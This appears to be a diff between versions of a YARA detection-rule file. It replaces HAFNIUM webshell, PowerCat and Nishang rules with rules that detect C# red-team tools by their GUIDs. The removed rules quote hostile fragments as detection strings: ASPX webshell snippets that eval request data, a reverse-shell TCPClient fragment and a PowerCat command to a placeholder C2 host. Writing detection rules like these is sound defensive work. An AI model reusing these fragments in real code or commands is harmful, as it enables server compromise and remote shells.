+		$typelibguid1up = "98075331-1F86-48C8-AE29-29DA39A8F98B" ascii wide
 
 	condition:
-		all of ( $c* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Cobaltgang_PDF_Metadata_Rev_A
+rule SIGNATURE_BASE_HKTL_NET_GUID_Crypter_Runtime_AV_S_Bypass : FILE
 {
 	meta:
-		description = "Find documents saved from the same potential Cobalt Gang PDF template"
-		author = "Palo Alto Networks Unit 42"
-		id = "bcf5bf6e-c786-5f78-bf58-e0631a17e62e"
-		date = "2018-10-25"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_cobalt_gang_pdf.yar#L1-L12"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "726cd57b-d88a-5854-b2e1-76d9bd71a155"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1652-L1666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8020ccff761b49d98e18cd5cb3c0695956a88e86a0958bfba1a19b7e3e629bb9"
+		logic_hash = "368023cf6e78965696f676a45858b671ff75f329419ec4d7a02767c81e503027"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "<xmpMM:DocumentID>uuid:31ac3688-619c-4fd4-8e3f-e59d0354a338" ascii wide
+		$typelibguid0lo = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii wide
+		$typelibguid0up = "C25E39A9-8215-43AA-96A3-DA0E9512EC18" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Embedded_Mar21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Runasuser : FILE
 {
 	meta:
-		description = "Detects ASP webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7cf7db9d-8f8a-51db-a0e6-84748e8f9e1f"
-		date = "2021-03-05"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L2-L16"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ead7819a-1397-5953-888f-2176e4041375"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/atthacks/RunAsUser"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1668-L1682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4a8b4cea6f53dad9771cb694ec55f305f04dfdbd8e663154cad672ca414c138c"
-		score = 85
+		logic_hash = "585db3eecb3bb91d594c1929c4790acbde8d1c44ae30de2410ef98796c297470"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<script runat=\"server\">" nocase
-		$s2 = "new System.IO.StreamWriter(Request.Form["
-		$s3 = ".Write(Request.Form["
+		$typelibguid0lo = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii wide
+		$typelibguid0up = "9DFF282C-93B9-4063-BF8A-B6798371D35A" ascii wide
 
 	condition:
-		filesize < 100KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Secchecker_Mar21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hwidbypass : FILE
 {
 	meta:
-		description = "Detects HAFNIUM SecChecker webshell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "73db3d78-7ece-53be-9efb-d19801993d5e"
-		date = "2021-03-05"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/markus_neis/status/1367794681237667840"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L18-L33"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "62b0541b-6eec-546e-8445-85d25bb0d784"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/yunseok/HWIDbypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1684-L1698"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e0e4df860bdde7d5c277f596535c493d926095be6f46f6ba41b6177afbfc5cd9"
+		logic_hash = "17d34d65e2867c054c7ef941c8f92a89c42f7d21a301fd5230970ac07d003d90"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<%if(System.IO.File.Exists(\"c:\\\\program files (x86)\\\\fireeye\\\\xagt.exe" ascii
-		$x2 = "\\csfalconservice.exe\")){Response.Write( \"3\");}%></head>" ascii fullword
+		$typelibguid0lo = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii wide
+		$typelibguid0up = "47E08791-D124-4746-BC50-24BD1EE719A6" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of them or 2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_HAFNIUM_Forensic_Artefacts_Mar21_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Xoredreflectivedll : FILE
 {
 	meta:
-		description = "Detects forensic artefacts found in HAFNIUM intrusions"
-		author = "Florian Roth (Nextron Systems)"
-		id = "872822b0-34d9-5ae4-a532-6a8786494fa9"
-		date = "2021-03-02"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L35-L48"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9b584bfb-98ef-50ee-b546-780c4b210a1b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/r3nhat/XORedReflectiveDLL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1700-L1716"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb86595956092506c2e29373faaf39a3987f9feed36a53b191bedd498db05cbb"
+		logic_hash = "8df590cacf5922fcc9d059b34b88774b1afeb78b0fcffe3cc2d8578d20baf0a0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "lsass.exe C:\\windows\\temp\\lsass" ascii wide fullword
-		$s2 = "c:\\ProgramData\\it.zip" ascii wide fullword
-		$s3 = "powercat.ps1'); powercat -c" ascii wide fullword
+		$typelibguid0lo = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii wide
+		$typelibguid0up = "C0E49392-04E3-4ABB-B931-5202E0EB4C73" ascii wide
+		$typelibguid1lo = "30eef7d6-cee8-490b-829f-082041bc3141" ascii wide
+		$typelibguid1up = "30EEF7D6-CEE8-490B-829F-082041BC3141" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Chopper_Webshell : APT HAFNIUM WEBSHELL FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Suite : FILE
 {
 	meta:
-		description = "Detects Chopper WebShell Injection Variant (not only Hafnium related)"
-		author = "Markus Neis,Swisscom"
-		id = "25dcf166-4aea-5680-b161-c5fc8d74b987"
-		date = "2021-03-05"
-		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L50-L65"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ab3cf358-a41d-584d-baaf-5e8f7232ca85"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/FuzzySecurity/Sharp-Suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1718-L1773"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c185a8da2a18fa59a8eeb36dbd95ba12c9c61717efc5f2d19d2d5b27ee243f2b"
+		logic_hash = "d71931b45525607ed0f442a925540dba3663aeae9b5e1fa8380ffe0ce2b5f5eb"
 		score = 75
-		quality = 85
-		tags = "APT, HAFNIUM, WEBSHELL, FILE"
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "runat=\"server\">" nocase
-		$s1 = "<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request" nocase
-		$s2 = "protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form[\"p\"] , false, Encoding.Default);sw.Write(Request.Form[\"f\"]);"
-		$s3 = "<script language=\"JScript\" runat=\"server\"> function Page_Load(){eval (Request[\"" nocase
+		$typelibguid0lo = "19657be4-51ca-4a85-8ab1-f6666008b1f3" ascii wide
+		$typelibguid0up = "19657BE4-51CA-4A85-8AB1-F6666008B1F3" ascii wide
+		$typelibguid1lo = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii wide
+		$typelibguid1up = "0A382D9A-897F-431A-81C2-A4E08392C587" ascii wide
+		$typelibguid2lo = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii wide
+		$typelibguid2up = "467EE2A9-2F01-4A71-9647-2A2D9C31E608" ascii wide
+		$typelibguid3lo = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii wide
+		$typelibguid3up = "EACAA2B8-43E5-4888-826D-2F6902E16546" ascii wide
+		$typelibguid4lo = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii wide
+		$typelibguid4up = "629F86E6-44FE-4C9C-B043-1C9B64BE6D5A" ascii wide
+		$typelibguid5lo = "ecf2ffe4-1744-4745-8693-5790d66bb1b8" ascii wide
+		$typelibguid5up = "ECF2FFE4-1744-4745-8693-5790D66BB1B8" ascii wide
+		$typelibguid6lo = "0a621f4c-8082-4c30-b131-ba2c98db0533" ascii wide
+		$typelibguid6up = "0A621F4C-8082-4C30-B131-BA2C98DB0533" ascii wide
+		$typelibguid7lo = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii wide
+		$typelibguid7up = "72019DFE-608E-4AB2-A8F1-66C95C425620" ascii wide
+		$typelibguid8lo = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii wide
+		$typelibguid8up = "F0D28809-B712-4380-9A59-407B7B2BADD5" ascii wide
+		$typelibguid9lo = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii wide
+		$typelibguid9up = "956A5A4D-2007-4857-9259-51CD0FB5312A" ascii wide
+		$typelibguid10lo = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii wide
+		$typelibguid10up = "A3B7C697-4BB6-455D-9FDA-4AB54AE4C8D2" ascii wide
+		$typelibguid11lo = "a5f883ce-1f96-4456-bb35-40229191420c" ascii wide
+		$typelibguid11up = "A5F883CE-1F96-4456-BB35-40229191420C" ascii wide
+		$typelibguid12lo = "28978103-d90d-4618-b22e-222727f40313" ascii wide
+		$typelibguid12up = "28978103-D90D-4618-B22E-222727F40313" ascii wide
+		$typelibguid13lo = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii wide
+		$typelibguid13up = "0C70C839-9565-4881-8EA1-408C1EBE38CE" ascii wide
+		$typelibguid14lo = "fa1d9a36-415a-4855-8c01-54b6e9fc6965" ascii wide
+		$typelibguid14up = "FA1D9A36-415A-4855-8C01-54B6E9FC6965" ascii wide
+		$typelibguid15lo = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii wide
+		$typelibguid15up = "252676F8-8A19-4664-BFB8-5A947E48C32A" ascii wide
+		$typelibguid16lo = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii wide
+		$typelibguid16up = "447EDEFC-B429-42BC-B3BC-63A9AF19DBD6" ascii wide
+		$typelibguid17lo = "04d0b3a6-eaab-413d-b9e2-512fa8ebd02f" ascii wide
+		$typelibguid17up = "04D0B3A6-EAAB-413D-B9E2-512FA8EBD02F" ascii wide
+		$typelibguid18lo = "5611236e-2557-45b8-be29-5d1f074d199e" ascii wide
+		$typelibguid18up = "5611236E-2557-45B8-BE29-5D1F074D199E" ascii wide
+		$typelibguid19lo = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii wide
+		$typelibguid19up = "53F622EB-0CA3-4E9B-9DC8-30C832DF1C7B" ascii wide
+		$typelibguid20lo = "414187db-5feb-43e5-a383-caa48b5395f1" ascii wide
+		$typelibguid20up = "414187DB-5FEB-43E5-A383-CAA48B5395F1" ascii wide
 
 	condition:
-		filesize < 10KB and $x1 and 1 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_Tiny_Webshell : APT HAFNIUM WEBSHELL FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rat_Shell : FILE
 {
 	meta:
-		description = "Detects WebShell Injection"
-		author = "Markus Neis,Swisscom"
-		id = "aa2fcecc-4c8b-570d-a81a-5dfb16c04e05"
-		date = "2021-03-05"
-		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L67-L82"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8f206175-f7e4-5543-8059-24f102fcd4b9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/stphivos/rat-shell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1775-L1791"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "099c8625c58b315b6c11f5baeb859f4c"
-		logic_hash = "9309f9b57353b6fe292048d00794699a8637a3e6e429c562fb36c7e459003a3b"
+		logic_hash = "2383483678c2a4b2545484c28aa81c2933c75a6bfb24dcfd6c989be90a2aca76"
 		score = 75
 		quality = 85
-		tags = "APT, HAFNIUM, WEBSHELL, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<%@ Page Language=\"Jscript\" Debug=true%>"
-		$s1 = "=Request.Form(\""
-		$s2 = "eval("
+		$typelibguid0lo = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii wide
+		$typelibguid0up = "7A15F8F6-6CE2-4CA4-919D-2056B70CC76A" ascii wide
+		$typelibguid1lo = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii wide
+		$typelibguid1up = "1659D65D-93A8-4BAE-97D5-66D738FC6F6C" ascii wide
 
 	condition:
-		filesize < 300 and all of ( $s* ) and $x1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_PS1_Powercat_Mar21 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnet_Gargoyle : FILE
 {
 	meta:
-		description = "Detects PowerCat hacktool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ae3963e8-2fe9-5bc3-bf72-95f136622832"
-		date = "2021-03-02"
-		modified = "2023-12-05"
-		reference = "https://github.com/besimorhino/powercat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L84-L103"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5efd0c83-cb65-5bda-b55e-4a89db5f337c"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/countercept/dotnet-gargoyle"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1793-L1811"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbd5c6f7c5b4ed713482588ee4490a2326fe11cfaacfb3bfc6a6d94130a8bc83"
+		logic_hash = "29147b4e14f45757274ca1bc0d140323a908d663f580b00cc705bd9cf3072f56"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c55672b5d2963969abe045fe75db52069d0300691d4f1f5923afeadf5353b9d2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com" ascii fullword
-		$x2 = "try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}" ascii fullword
-		$s1 = "Returning Encoded Payload..." ascii
-		$s2 = "$CommandToExecute =" ascii fullword
-		$s3 = "[alias(\"Execute\")][string]$e=\"\"," ascii
+		$typelibguid0lo = "76435f79-f8af-4d74-8df5-d598a551b895" ascii wide
+		$typelibguid0up = "76435F79-F8AF-4D74-8DF5-D598A551B895" ascii wide
+		$typelibguid1lo = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii wide
+		$typelibguid1up = "5A3FC840-5432-4925-B5BC-ABC536429CB5" ascii wide
+		$typelibguid2lo = "6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii wide
+		$typelibguid2up = "6F0BBB2A-E200-4D76-B8FA-F93C801AC220" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of ( $x* ) or 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_Nishang_PS1_Invoke_Powershelltcponeline
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aresskit : FILE
 {
 	meta:
-		description = "Detects PowerShell Oneliner in Nishang's repository"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0218ebbd-2dbe-5838-ab53-1e78e3f97b9e"
-		date = "2021-03-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L105-L119"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8265cd84-c8e7-5654-9d3a-774dab52d938"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/BlackVikingPro/aresskit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1813-L1827"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "59622bff95de1077d26ee4547f37cd1045c0c1fc6817df40ff2564b33a962a07"
+		logic_hash = "d0a1c7000c4018ba3c7405e310cfddea8795745216467dfb79379af521889cc6"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "2f4c948974da341412ab742e14d8cdd33c1efa22b90135fcfae891f08494ac32"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "=([text.encoding]::ASCII).GetBytes((iex $" ascii wide
-		$s2 = ".GetStream();[byte[]]$" ascii wide
-		$s3 = "New-Object Net.Sockets.TCPClient('" ascii wide
+		$typelibguid0lo = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii wide
+		$typelibguid0up = "8DCA0E42-F767-411D-9704-AE0BA4A44AE8" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Simpleseesharp : WEBSHELL UNCLASSIFIED FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injector : FILE
 {
 	meta:
-		description = "A simple ASPX Webshell that allows an attacker to write further files to disk."
-		author = "threatintel@volexity.com"
-		id = "469fdf5c-e09e-5d44-a2e6-0864dcd0e18a"
-		date = "2021-03-01"
-		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L121-L136"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "301e70f4-89ed-539c-b7f3-9fc6ae1393b3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/tmthrgd/DLL-Injector"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1829-L1845"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"
-		logic_hash = "6f62249a68bae94e5cbdb4319ea5cde9dc071ec7a4760df3aafe78bc1e072c30"
+		logic_hash = "45f63db2fbb807ecab8ebc91bc3ba781f145c60d8e84afd7ea07c57d5aa7bb41"
 		score = 75
 		quality = 85
-		tags = "WEBSHELL, UNCLASSIFIED, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$header = "<%@ Page Language=\"C#\" %>"
-		$body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"
+		$typelibguid0lo = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii wide
+		$typelibguid0up = "4581A449-7D20-4C59-8DA2-7FD830F1FD5E" ascii wide
+		$typelibguid1lo = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii wide
+		$typelibguid1up = "05F4B238-25CE-40DC-A890-D5BBB8642EE4" ascii wide
 
 	condition:
-		$header at 0 and $body and filesize < 1KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_CVE_2021_27065_Webshells : CVE_2021_27065 FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Trufflesnout : FILE
 {
 	meta:
-		description = "Detects web shells dropped by CVE-2021-27065. All actors, not specific to HAFNIUM. TLP:WHITE"
-		author = "Joe Hannon, Microsoft Threat Intelligence Center (MSTIC)"
-		id = "27677f35-24a3-59cc-a3ad-b83884128da7"
-		date = "2021-03-05"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L182-L200"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8135d39e-6a9e-567d-840f-8d8c6338cce1"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/dsnezhkov/TruffleSnout"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1847-L1861"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71795ba67bc8a4cea06b93da34b6291029ff74b200e37eb66f6ac51a6ff194cd"
+		logic_hash = "5c3a69776d1c1f2503b85e410eef83067e178c22e08dcefdecbe73040bf1d737"
 		score = 75
-		quality = 61
-		tags = "CVE-2021-27065, FILE"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$script1 = "script language" ascii wide nocase
-		$script2 = "page language" ascii wide nocase
-		$script3 = "runat=\"server\"" ascii wide nocase
-		$script4 = "/script" ascii wide nocase
-		$externalurl = "externalurl" ascii wide nocase
-		$internalurl = "internalurl" ascii wide nocase
-		$internalauthenticationmethods = "internalauthenticationmethods" ascii wide nocase
-		$extendedprotectiontokenchecking = "extendedprotectiontokenchecking" ascii wide nocase
+		$typelibguid0lo = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii wide
+		$typelibguid0up = "33842D77-BCE3-4EE8-9EE2-9769898BB429" ascii wide
 
 	condition:
-		filesize < 50KB and any of ( $script* ) and ( $externalurl or $internalurl ) and $internalauthenticationmethods and $extendedprotectiontokenchecking
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Anti_Analysis : FILE
 {
 	meta:
-		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9c2ba123-63c4-5e9c-a08f-bd9db3304691"
-		date = "2021-03-07"
-		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hafnium.yar#L202-L216"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bd527841-065e-57e9-b70e-c9d232072f1b"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/NYAN-x-CAT/Anti-Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1863-L1877"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "391b366d78c2f24dc006a5365ec232a9a3c2fe0ea514b18897701ceeffcc81ca"
-		score = 85
+		logic_hash = "60d7b68aabc6819c8bbc3adfa069f624df4ba3fecd7548841a8cd2f4415fd1a7"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "runat=\"server\">void Page_Load(object" ascii wide
-		$s2 = "Request.Files[0].SaveAs(Server.MapPath(" ascii wide
+		$typelibguid0lo = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii wide
+		$typelibguid0up = "3092C8DF-E9E4-4B75-B78E-F81A0058A635" ascii wide
 
 	condition:
-		filesize < 50KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Backnet : FILE
 {
 	meta:
-		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "93f5b682-642d-5edf-84a9-296bf12cd72b"
-		date = "2021-03-07"
-		modified = "2023-12-05"
